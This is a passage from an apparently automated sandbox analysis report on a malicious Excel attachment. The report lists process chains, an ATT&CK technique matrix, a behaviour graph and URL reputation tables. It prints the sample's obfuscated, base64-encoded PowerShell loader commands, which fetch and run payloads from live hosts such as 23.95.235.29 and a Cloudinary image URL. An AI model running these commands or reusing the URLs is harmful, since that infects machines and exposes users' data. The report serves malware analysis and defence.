gicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $comicsverse = 'jghlbgljb3byb3rlawqgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskbwv0yxboexrlid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsky2hvdwwgpsakbwv0yxboexrllkrvd25sb2fkrgf0ysgkagvsawnvchjvdgvpzck7jhbvb2tvbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrjag91bck7jhjhbmdpbmvzcya9icc8pejbu0u2nf9tvefsvd4+jzskegfudghhbgluzsa9icc8pejbu0u2nf9ftkq+pic7jfbpemfycm8gpsakcg9va29vlkluzgv4t2yojhjhbmdpbmvzcyk7jghhbmdlcia9icrwb29rb28usw5kzxhpzigkegfudghhbgluzsk7jfbpemfycm8glwdlidaglwfuzcakagfuz2vyic1ndcakugl6yxjybzskugl6yxjybyarpsakcmfuz2luzxnzlkxlbmd0adskc3ludgf4aw4gpsakagfuz2vyic0gjfbpemfycm87jgluc2fsdmvhymxlid0gjhbvb2tvby5tdwjzdhjpbmcojfbpemfycm8sicrzew50yxhpbik7jhvuy2x1dhrlcia9ic1qb2luicgkaw5zywx2zwfibguuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgluc2fsdmvhymxllkxlbmd0acldoyrjyxrhc3ryb3bozsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhvuy2x1dhrlcik7jg5lcghyb2kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhc3ryb3bozsk7jgnvbnzlcmjzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgnvbnzlcmjzlkludm9rzsgkbnvsbcwgqcgnmc9mv3pwcs9yl2vllmv0c2fwly86c3b0dggnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanq2fzug9sjywgjyroyxnzbgvkjywgjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjzenlcckagfzc2xlzccsjycpkts=';$eyeing = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($comicsverse));invoke-expression $eyeing
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information121
        Scripting
        Valid Accounts121
        Command and Scripting Interpreter
        121
        Scripting
        11
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Process Discovery
        Remote Services1
        Email Collection
        1
        Web Service
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts23
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        21
        Virtualization/Sandbox Evasion
        LSASS Memory21
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell
        Logon Script (Windows)Logon Script (Windows)11
        Process Injection
        Security Account Manager1
        Application Window Discovery
        SMB/Windows Admin Shares1
        Clipboard Data
        3
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Obfuscated Files or Information
        NTDS1
        Remote System Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Install Root Certificate
        LSA Secrets1
        File and Directory Discovery
        SSHKeylogging13
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials14
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574858 Sample: NB PO-104105107108.xls Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 102 Suricata IDS alerts for network traffic 2->102 104 Malicious sample detected (through community Yara rule) 2->104 106 Antivirus detection for URL or domain 2->106 108 16 other signatures 2->108 10 EXCEL.EXE 35 39 2->10         started        process3 dnsIp4 63 23.95.235.29, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 10->63 65 curt.wiz.co 10->65 67 curt.wiz.co.cdn.gocache.net 170.82.173.30, 443, 49163, 49165 3LCLOUDINTERNETSERVICESLTDA-EPPBR Brazil 10->67 59 C:\Users\user\...\~DFC80289B61A888CC7.TMP, Composite 10->59 dropped 61 greatnicefeaturesw...lineforgiven[1].hta, HTML 10->61 dropped 120 Microsoft Office drops suspicious files 10->120 15 mshta.exe 10 10->15         started        19 mshta.exe 10 10->19         started        file5 signatures6 process7 dnsIp8 80 curt.wiz.co 15->80 82 curt.wiz.co.cdn.gocache.net 15->82 90 Suspicious command line found 15->90 92 PowerShell case anomaly found 15->92 21 cmd.exe 15->21         started        84 curt.wiz.co 19->84 86 170.82.174.30, 443, 49171, 49172 3LCLOUDINTERNETSERVICESLTDA-EPPBR Brazil 19->86 88 curt.wiz.co.cdn.gocache.net 19->88 24 cmd.exe 19->24         started        signatures9 process10 signatures11 110 Suspicious powershell command line found 21->110 112 Wscript starts Powershell (via cmd or directly) 21->112 114 PowerShell case anomaly found 21->114 26 powershell.exe 23 21->26         started        30 powershell.exe 24->30         started        process12 file13 55 freesizedressforna...nthiscaseforyou.vbS, Unicode 26->55 dropped 57 C:\Users\user\AppData\...\1dk2y04d.cmdline, Unicode 26->57 dropped 118 Installs new ROOT certificates 26->118 32 wscript.exe 1 26->32         started        35 csc.exe 2 26->35         started        38 wscript.exe 30->38         started        40 csc.exe 2 30->40         started        signatures14 process15 file16 94 Suspicious powershell command line found 32->94 96 Wscript starts Powershell (via cmd or directly) 32->96 98 Windows Scripting host queries suspicious COM object (likely to drop second stage) 32->98 100 Suspicious execution chain found 32->100 42 powershell.exe 12 4 32->42         started        51 C:\Users\user\AppData\Local\...\1dk2y04d.dll, PE32 35->51 dropped 45 cvtres.exe 35->45         started        47 powershell.exe 38->47         started        53 C:\Users\user\AppData\Local\...\u10solcd.dll, PE32 40->53 dropped 49 cvtres.exe 40->49         started        signatures17 process18 dnsIp19 69 paste.ee 42->69 72 res.cloudinary.com 42->72 74 paste.ee 47->74 76 cloudinary.map.fastly.net 151.101.193.137, 443, 49174 FASTLYUS United States 47->76 78 res.cloudinary.com 47->78 signatures20 116 Connects to a pastebin service (likely for C&C) 74->116

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        NB PO-104105107108.xls24%ReversingLabs
        NB PO-104105107108.xls100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\~DFC80289B61A888CC7.TMP100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta...0%Avira URL Cloudsafe
        http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta0%Avira URL Cloudsafe
        http://23.95.235.29/ic0%Avira URL Cloudsafe
        http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta%64%6f%63%0%Avira URL Cloudsafe
        https://curt.wiz.co/9100%Avira URL Cloudmalware
        https://curt.wiz.co/VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluf100%Avira URL Cloudmalware
        https://curt.wiz.co/VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda100%Avira URL Cloudmalware
        http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF0%Avira URL Cloudsafe
        http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htahttp://23.0%Avira URL Cloudsafe
        https://curt.wiz.co/100%Avira URL Cloudmalware
        http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFC:0%Avira URL Cloudsafe
        http://23.95.235.29/PROC0%Avira URL Cloudsafe
        https://curt.wiz.co/1.0100%Avira URL Cloudmalware
        http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFp0%Avira URL Cloudsafe
        http://23.95.235.29/118/freesize0%Avira URL Cloudsafe
        https://curt.wiz.co/E=AL.100%Avira URL Cloudmalware
        http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaC:0%Avira URL Cloudsafe
        http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htalife=fluff0%Avira URL Cloudsafe
        http://23.95.235.29/0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        paste.ee
        188.114.96.6
        truefalse
          high
          cloudinary.map.fastly.net
          151.101.193.137
          truefalse
            high
            curt.wiz.co.cdn.gocache.net
            170.82.173.30
            truefalse
              unknown
              res.cloudinary.com
              unknown
              unknownfalse
                high
                curt.wiz.co
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFtrue
                  • Avira URL Cloud: safe
                  unknown
                  https://curt.wiz.co/VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&verandafalse
                  • Avira URL Cloud: malware
                  unknown
                  http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htatrue
                  • Avira URL Cloud: safe
                  unknown
                  https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgfalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://23.95.235.29/icmshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://curt.wiz.co/9mshta.exe, 00000010.00000002.512248812.0000000000394000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511764708.0000000000394000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://curt.wiz.co/VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=flufmshta.exe, 00000010.00000002.512248812.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, NB PO-104105107108.xls, ~DFC80289B61A888CC7.TMP.0.drfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta...mshta.exe, 00000004.00000002.457860931.00000000002B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457492496.00000000002B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.entrust.net03mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Iconpowershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta%64%6f%63%mshta.exe, 00000004.00000003.457688239.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.506693238.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.506713612.00000000029BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://curt.wiz.co/mshta.exe, 00000004.00000003.457492496.00000000002E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.457860931.00000000002E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458394277.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457247139.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512248812.0000000000394000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511764708.0000000000394000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgXpowershell.exe, 0000000E.00000002.540924490.0000000002401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.573394856.0000000002231000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://go.microspowershell.exe, 00000008.00000002.478285781.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.519092403.00000000029BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htahttp://23.mshta.exe, 00000004.00000003.457688239.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511256178.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.506656785.00000000029B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFC:powershell.exe, 00000008.00000002.485183469.000000001C262000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.524693092.000000001AE20000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://res.cloudinary.compowershell.exe, 0000000E.00000002.540924490.0000000002401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.573394856.0000000002231000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaC:mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.0000000002811000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://contoso.com/powershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://23.95.235.29/mshta.exe, 00000004.00000002.458394277.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457247139.000000000369D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFppowershell.exe, 00000008.00000002.478285781.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.519092403.00000000025E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://curt.wiz.co/E=AL.mshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://curt.wiz.co/1.0mshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.478285781.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.540924490.0000000002201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.519092403.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.573394856.0000000002031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C230000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.0000000002811000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
